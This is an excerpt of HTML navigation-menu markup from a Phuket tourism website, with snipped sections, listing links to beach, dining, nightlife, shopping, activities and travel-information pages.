<li><a class="level3" href="http://www.phuket.com/island/naiyang-beach.htm" >The Beach of Nai Yang</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/attractions/naiyang-attractions.htm" >Nai Yang Beach Attractions</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/activities/nai-yang-activities.htm" >Nai Yang Beach Activities</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket-maps.com/naiyang.htm" >Nai Yang Beach Map</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/island/paradise-beach.htm" >Paradise Beach</a>
...[SNIP]...
<li><a class="level2-arrow" href="http://www.phuket.com/island/beaches_patong.htm" ><strong>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/hotel/patong-beach.htm" >Patong Beach Hotels</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/island/patong-beach.htm" >The Beach of Patong</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/attractions/patong-attractions.htm" >Patong Beach Attractions</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/dining/patong.htm" >Patong Beach Restaurants</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/nightlife/patong-beach.htm" >Patong Beach Nightlife</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/shopping/patong-shopping.htm" >Patong Beach Shopping</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/activities/patong-activities.htm" >Patong Beach Activities</a>
...[SNIP]...
<li><a class="level2-arrow" href="http://www.phuket.com/island/phuket.htm" ><strong>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/hotel/phuket-town.htm" >Phuket Town Hotels</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/attractions/phuket-attractions.htm" >Phuket Town Attractions</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/dining/phuket.htm" >Phuket Town Restaurants</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/nightlife/phuket-town.htm" >Phuket Town Nightlife</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/shopping/phuket-town.htm" >Phuket Town Shopping</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket-maps.com/phuket_town.htm" >Phuket Town Map</a>
...[SNIP]...
<li><a class="level2-arrow" href="http://www.phuket.com/island/beaches_rawai.htm" ><strong>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/hotel/rawai.htm" >Rawai Beach Hotels</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/island/rawai-beach.htm" >The Beach of Rawai</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/attractions/rawai-attractions.htm" >Rawai Beach Attractions</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/dining/rawai.htm" >Rawai Beach Restaurants</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/nightlife/rawai-naiharn.htm" >Rawai Beach Nightlife</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/shopping/rawai-shopping.htm" >Rawai Beach Shopping</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/activities/rawai-activities.htm" >Rawai Beach Activities</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket-maps.com/rawai-beach.htm" >Rawai Beach Map</a>
...[SNIP]...
<li><a class="level2-arrow" href="http://www.phuket.com/island/beaches_surin.htm" ><strong>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/hotel/surin-beach.htm" >Surin Beach Hotels</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/island/surin-beach.htm" >The Beach of Surin</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/dining/surin.htm" >Surin Beach Restaurants</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/nightlife/surin-beach.htm" >Surin Beach Nightlife</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/shopping/surin-shopping.htm" >Surin Beach Shopping</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/activities/surin-activities.htm" >Surin Beach Activities</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket-maps.com/surin-beach.htm" >Surin Beach Map</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/island/ya-nui-beach.htm" >Ya Nui Beach</a>
...[SNIP]...
<li>
   <a class="menutitle-arrow" href="http://www.phuket.com/islands.htm" >Islands Nearby Phuket</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/island/ci.htm" >Coral Island</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/magazine/pan-yee-island.htm" >Koh Panyee</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/island/kohyao.htm" >Koh Yao Noi & Yai</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/island/phangnga.htm" >Phang Nga Bay Islands</a>
...[SNIP]...
<li><a class="level2-arrow" href="http://www.phuket.com/island/phiphi.htm" ><strong>
...[SNIP]...
<li><a class="level3" href="http://www.krabi-hotels.com/hotels/phi-phi-island.htm" >Phi Phi Island Hotels</a>
...[SNIP]...
<li><a class="level3" href="http://www.phiphi.phuket.com/beaches/" >Phi Phi Island Beaches</a>
...[SNIP]...
<li><a class="level3" href="http://www.phiphi.phuket.com/tours.htm" >Phi Phi Island Tours</a>
...[SNIP]...
<li><a class="level3" href="http://www.phiphi.phuket.com/attractions.htm" >Phi Phi Island Attractions</a>
...[SNIP]...
<li><a class="level3" href="http://www.phiphi.phuket.com/restaurants.htm" >Phi Phi Island Restaurants</a>
...[SNIP]...
<li><a class="level3" href="http://www.phiphi.phuket.com/nightlife.htm" >Phi Phi Island Nightlife</a>
...[SNIP]...
<li><a class="level3" href="http://www.phiphi.phuket.com/shopping.htm" >Phi Phi Island Shopping</a>
...[SNIP]...
<li><a class="level3" href="http://www.phiphi.phuket.com/activities.htm" >Phi Phi Island Activities</a>
...[SNIP]...
<li><a class="level3" href="http://www.phiphi.phuket.com/info.htm" >Phi Phi Island Information</a>
...[SNIP]...
<li><a class="level3" href="http://www.krabi-maps.com/phiphi.htm" >Phi Phi Islands Map</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/island/racha.htm" >Racha Island</a>
...[SNIP]...
<li><a class="level2-arrow" href="http://www.phuket.com/island/similans.htm" ><strong>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/island/similans.htm" >Similan Islands Overview</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/island/surin.htm" >Surin Island</a>
...[SNIP]...
<li>
   <a class="menutitle-arrow" href="http://www.phuket.com/tours/" >Phuket Tours</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/tours/10mustdo.htm" ><strong>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/island/10mustsee_beyond.htm" ><strong>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/island/seacanoe.htm" >Sea Kayaking</a>
...[SNIP]...
<li><a class="level2-arrow" href="http://www.phuket.com/tours/destinations.htm" ><strong>
...[SNIP]...
<li><a class="level3" href="http://www.krabi-travel.com/destination/#lanta" >Koh Lanta Tours</a>
...[SNIP]...
<li><a class="level3" href="http://www.krabi-travel.com/" >Krabi Tours</a>
...[SNIP]...
<li><a class="level2-arrow" href="http://www.phuket.com/magazine/tour.htm" >Tour Reviews</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/magazine/tour-reviews-sports.htm" >Active Sports Tours</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/magazine/tour-reviews-cruises.htm" >Cruises & Sunset Tours</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/magazine/tour-reviews-eco.htm" >Eco Tours</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/magazine/tour-reviews-discovery.htm" >Island Discovery Tours</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/magazine/tour-reviews-kayak.htm" >Sea Kayaking Tours</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/magazine/tour-reviews-speedboats.htm" >Speedboat Tours</a>
...[SNIP]...
<li>
   <a class="menutitle-arrow" href="http://www.phuket.com/island/attract.htm" >Phuket Attractions</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/island/10mustsee.htm" ><strong>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/attractions/all-attractions.htm" ><strong>
...[SNIP]...
<li><a class="level2-arrow" href="http://www.phuket.com/attractions/" >Attractions by Areas</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/attractions/bangtao-attractions.htm" >Bangtao Attractions</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/attractions/chalong-attractions.htm" >Chalong Bay Attractions</a>
...[SNIP]...
<li><a class="level3" href="https://cms.awd.ws:8443/phuket/portals/phuket-com/homepage/attractions/kamala-attractions" >Kamala Beach Attractions</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/attractions/karon-attractions.htm" >Karon Beach Attractions</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/attractions/kata-attractions.htm" >Kata Beach Attractions</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/attractions/maikhao-attractions.htm" >Mai Khao Beach Attractions</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/attractions/nai-harn-attractions.htm" >Nai Harn Beach Attractions</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/attractions/naiyang-attractions.htm" >Nai Yang Beach Attractions</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/attractions/patong-attractions.htm" >Patong Beach Attractions</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/attractions/phuket-attractions.htm" >Phuket Town Attractions</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/attractions/rawai-attractions.htm" >Rawai Beach Attractions</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/beyond/" >Beyond Phuket</a>
...[SNIP]...
<li><a class="level2-arrow" href="http://www.phuket.com/magazine/discover-phuket.htm" ><strong>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/magazine/eating-insects.htm" >Eating Fried Insects</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/magazine/thai-lottery.htm" >Lottery Madness</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/magazine/thai-funny-things.htm" >Unusual & Funny Things</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/magazine/yadong.htm" >Yadong (Thai Viagra) </a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/island/entertain.htm" >Entertainment</a>
...[SNIP]...
<li><a class="level2-arrow" href="http://www.phuket.com/festival/" >Events & Festivals</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/events.htm" >Calendar</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/festival/chinese-new-year.htm" >Chinese New Year</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/gay/" >Gay Festival</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/festival/phuket-carnival.htm" >King's Cup Regatta</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/festival/loy_krathong.htm" >Loy Krathong</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/festival/vegetarian.htm" >Phuket Vegetarian Festival</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/festival/songkran.htm" >Songkran</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/island/museums.htm" >Museums</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/island/parks.htm" >National Parks</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/magazine3/focus.htm" >Old Phuket Town</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/magazine/phuket-fantasea.htm" >Phuket Fantasea</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/island/phuket-viewpoints.htm" >Phuket Viewpoints</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/magazine/phuket-waterfalls.htm" >Phuket Waterfalls</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/island/temples.htm" >Temples & Shrines of Phuket</a>
...[SNIP]...
<li>
   <a class="menutitle-arrow" href="http://www.phuket.com/dining/" >Phuket Restaurants</a>
...[SNIP]...
<li><a class="level2-arrow" href="http://www.phuket.com/dining/index_location.htm" ><strong>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/dining/bangtao.htm" >Bangtao Beach Restaurants</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/dining/chalong.htm" >Chalong Bay Restaurants</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/dining/kamala.htm" >Kamala Beach Restaurants</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/dining/karon.htm" >Karon Beach Restaurants</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/dining/kata.htm" >Kata Beach Restaurants</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/dining/mai-khao.htm" >Mai Khao Beach Restaurants</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/dining/naiharn.htm" >Nai Harn Beach Restaurants</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/dining/patong.htm" >Patong Beach Restaurants</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/dining/phuket.htm" >Phuket Town Restaurants</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/dining/rawai.htm" >Rawai Beach Restaurants</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/dining/surin.htm" >Surin Beach Restaurants</a>
...[SNIP]...
<li><a class="level2-arrow" href="http://www.phuket.com/magazine/restaurant.htm" ><strong>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/dining/bangtao-restaurant-reviews.htm" >Bangtao Beach</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/dining/chalong-panwa-naiharn-restaurant-reviews.htm" >Chalong, Nai Harn, Panwa</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/dining/kamala-restaurant-reviews.htm" >Kamala Beach</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/dining/kata-karon-restaurant-reviews.htm" >Karon Beach</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/dining/kata-restaurant-reviews.htm" >Kata Beach</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/dining/patong-restaurant-reviews.htm" >Patong Beach</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/dining/phuket-town-restaurant-reviews.htm" >Phuket Town</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/dining/surin-kamala-bangtao-restaurant-reviews.htm" >Surin Beach</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/dining/nearby-phuket-restaurant-reviews.htm" >Nearby Phuket</a>
...[SNIP]...
<li><a class="level2-arrow" href="http://www.phuket.com/dining/thai-food.htm" >Thai Food</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/magazine/thai-food.htm" >1st Time Thai Food</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/dining/howto.htm" >Do's and Don'ts</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/magazine/discover-fresh-market.htm" >Fresh markets</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/dining/thai-food.htm" >Overview</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/magazine/phuket-seafood.htm" >Phuket Seafood</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/dining/index_cuisine.htm" >Street Food & Hawker Food</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/magazine/thai-cooking.htm" >Thai Recipes</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/cuisine/toptenfood.htm" >Top 10 Thai Food</a>
...[SNIP]...
<li>
   <a class="menutitle-arrow" href="http://www.phuket.com/nightlife/" >Phuket Nightlife</a>
...[SNIP]...
<li><a class="level2-arrow" href="http://www.phuket.com/nightlife/phuket-nightlife.htm" >Nightlife by Areas</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/nightlife/bang-tao.htm" >Bangtao Beach Nightlife</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/nightlife/chalong_rawai.htm" >Chalong Bay Nightlife</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/nightlife/kamala-beach.htm" >Kamala Beach Nightlife</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/nightlife/karon-beach.htm" >Karon Beach Nightlife</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/nightlife/kata-beach.htm" >Kata Beach Nightlife</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/nightlife/naiharn.htm" >Nai Harn Beach Nightlife</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/nightlife/patong-beach.htm" >Patong Beach Nightlife</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/nightlife/phuket-town.htm" >Phuket Town Nightlife</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/nightlife/rawai-naiharn.htm" >Rawai Beach Nightlife</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/nightlife/surin-beach.htm" >Surin Beach Nightlife</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/nightlife/patong-areas.htm" >Patong Best Hot Spots</a>
...[SNIP]...
<li><a class="level2-arrow" href="http://www.phuket.com/nightlife/patong-hotspots.htm" ><strong>
...[SNIP]...
</strong> <img src="http://static.asiawebdirect.com/images/hot.gif"/></a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/nightlife/bars.htm" >Beer Bars & Girls <img src="http://static.asiawebdirect.com/images/hot.gif"/></a></li>

   
       <li><a class="level3" href="http://www.phuket.com/nightlife/cabarets.htm" >Cabarets</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/nightlife/discos.htm" >Discos</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/magazine/patong-nightlife.htm" >First Time Nightlife</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/gay/" >Gay Phuket</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/nightlife/patong-tips.htm" >Girls, Ladyboys & Tips <img src="http://static.asiawebdirect.com/images/hot.gif"/></a></li>

   
       <li><a class="level3" href="http://www.phuket.com/nightlife/go-go-bars.htm" >Go Go Bars <img src="http://static.asiawebdirect.com/images/hot.gif"/></a></li>

   
       <li><a class="level3" href="http://www.phuket.com/nightlife/bangla.htm" >Hot Bangla Road <img src="http://static.asiawebdirect.com/images/hot.gif"/></a></li>

   
       <li><a class="level3" href="http://www.phuket.com/nightlife/patong-hotspots.htm" >Nightlife by Type</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/magazine4/focus.htm" >Simon Cabaret</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/nightlife/thai-boxing.htm" >Thai Boxing</a>
...[SNIP]...
<li>
   <a class="menutitle-arrow" href="http://www.phuket.com/shopping/" >Phuket Shopping</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/magazine/phuket-shopping.htm" >1st Time Shopping Guide</a>
...[SNIP]...
<li><a class="level2-arrow" href="http://www.phuket.com/shopping/location.htm" >Shopping by Areas</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/shopping/bangtao-kamala.htm" >Bangtao Beach Shopping</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/shopping/chalong-shopping.htm" >Chalong Bay Shopping</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/shopping/kamala-shopping.htm" >Kamala Beach Shopping</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/shopping/karon-shopping.htm" >Karon Beach Shopping</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/shopping/kata-karon-shopping.htm" >Kata Beach Shopping</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/shopping/maikhao-shopping.htm" >Mai Khao Beach Shopping</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/shopping/nai-harn-shopping.htm" >Nai Harn Beach Shopping</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/shopping/patong-shopping.htm" >Patong Beach Shopping</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/shopping/phuket-town.htm" >Phuket Town Shopping</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/shopping/rawai-shopping.htm" >Rawai Beach Shopping</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/shopping/surin-shopping.htm" >Surin Beach Shopping</a>
...[SNIP]...
<li><a class="level2-arrow" href="http://www.phuket.com/shopping/buy.htm" >What to Buy in Phuket</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/shopping/ceramics.htm" >Ceramics & Lacquerware</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/shopping/houseware.htm" >Furniture Shops</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/shopping/gems.htm" >Gems, Gold and Pearls</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/magazine/discover-asian-arts.htm" >Luxury Asian Art Shops</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/shopping/tips.htm" >Shopping Tips</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/shopping/buy_tailor.htm" >Tailors</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/shopping/paintings.htm" >Thai Antiques</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/shopping/textiles.htm" >Thai Silk</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/shopping/handicrafts.htm" >Wickerworks & handicrafts</a>
...[SNIP]...
<li><a class="level2-arrow" href="http://www.phuket.com/shopping/buy.htm" >Where to Shop in Phuket</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/shopping/central-festival.htm" >Central Festival Phuket</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/shopping/jungceylon.htm" >Jungceylon Shopping Mall</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/magazine/discover-asian-arts.htm" >Phuket Art Galleries</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/magazine/discover-fresh-market.htm" >Phuket Markets</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/shopping/shopping-centers.htm" >Phuket Shopping Malls</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/shopping/directory.htm" >Phuket Shops Directory</a>
...[SNIP]...
<li>
   <a class="menutitle-arrow" href="http://www.phuket.com/activities/" >Phuket Activities</a>
...[SNIP]...
<li><a class="level2-arrow" href="http://www.phuket.com/activities/by-areas.htm" >Activities by Areas</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/activities/bangtao-activities.htm" >Bangtao Beach Activities</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/activities/kamala-activities.htm" >Kamala Beach Activities</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/activities/karon-activities.htm" >Karon Beach Activities</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/activities/kata-activities.htm" >Kata Beach Activities</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/activities/maikhao-activities.htm" >Mai Khao Beach Activities</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/activities/nai-harn-activities.htm" >Nai Harn Beach Activities</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/activities/nai-yang-activities.htm" >Nai Yang Beach Activities</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/activities/patong-activities.htm" >Patong Beach Activities</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/activities/rawai-activities.htm" >Rawai Beach Activities</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/activities/surin-activities.htm" >Surin Beach Activities</a>
...[SNIP]...
<li><a class="level2-arrow" href="http://www.phuket.com/activities/kids_stuff.htm" >Family Activities</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/activities/by-age.htm" >Kids Activities</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/activities/family.htm" >Kids Friendly Hotels</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/magazine/phuket-fantasea.htm" >Phuket Fantasea</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/hotel/recommendations-family-resorts.htm" >Top 10 Family Hotels</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/activities/top-10-kids.htm" >Top 10 Kids Activities</a>
...[SNIP]...
<li><a class="level2-arrow" href="http://www.phuket.com/golf/" >Golf</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket-golf.com/blue-canyon-country-club.htm" >Blue Canyon Country Club</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket-golf.com/laguna-phuket-golf.htm" >Laguna Phuket Golf Club</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket-golf.com/loch-palm-golf.htm" >Loch Palm Golf Club</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket-golf.com/mission-hills-golf.htm" >Mission Hills Golf Club</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket-golf.com/phuket-country-club.htm" >Phuket Country Club</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket-golf.com/thai-muang-golf.htm" >Thai Muang Golf Club</a>
...[SNIP]...
<li><a class="level2-arrow" href="http://www.phuket.com/sports/land_sports.htm" >Land Sports</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/sports/fitness.htm" >Fitness</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/magazine/discover-takraw.htm" >Sepak Takraw</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/sports/muay_thai.htm" >Thai Boxing (Muay Thai)</a>
...[SNIP]...
<li><a class="level2-arrow" href="http://www.phuket.com/diving/" >Scuba Diving</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/magazine/diving-options.htm" >1st Time Diving in Phuket</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/diving/directory.htm" >Dive Shops Directory</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/diving/instruction.htm" >Diving Courses</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/diving/diveasia.htm" >Diving Daytrips</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/magazine/family-diving.htm" >Kids Diving in Phuket</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/diving/diveasia2.htm" >Live Aboard Cruises</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/diving/sites/" >Phuket Dive Sites</a>
...[SNIP]...
<li><a class="level3" href="http://www.diving.phuket.com/" >Phuket Diving Guide</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/magazine/luxury-diving.htm" >Phuket Luxury Diving</a>
...[SNIP]...
<li><a class="level2-arrow" href="http://www.phuket.com/spa_massage/" >Spa & Massage</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/hotel/spa-resort.htm" >All Spa Resorts</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/magazine/health.htm" >Healthy Holiday in Phuket</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/hotel/recommendations-spa-resorts.htm" >Phuket 10 Best Spa Resorts</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/spa_massage/" >Spa & Massages Overview</a>
...[SNIP]...
<li><a class="level2-arrow" href="http://www.phuket.com/sports/water_sports.htm" >Water Activities</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/sports/water_sports.htm" >Beach Sports</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/fishing/" >Fishing</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/sports/jet-skis.htm" >Jet Skis</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/sports/kite-surfing.htm" >Kite Surfing</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/sailing/" >Sailing</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/island/seacanoe.htm" >Sea Kayaking</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/sports/snorkeling.htm" >Snorkelling</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/sports/surfing.htm" >Surfing</a>
...[SNIP]...
<li>
   <a class="menutitle-arrow" href="http://www.phuket.com/info/" >Phuket Information</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/sales/" ><strong>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/conservation/" >Animal Conservation</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/magazine/discover-phuket.htm" ><strong>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/info/environment.htm" >Environment</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/info/geography.htm" >Geography of Phuket</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/info/travel_around.htm" >Getting Around</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/info/travel_there.htm" >Getting There</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/info/weddings.htm" >Getting Married</a>
...[SNIP]...
<li><a class="level2-arrow" href="http://www.phuket.com/health/" >Health Tourism</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/health/dentistry.htm" >Cosmetic Dentistry</a>
...[SNIP]...
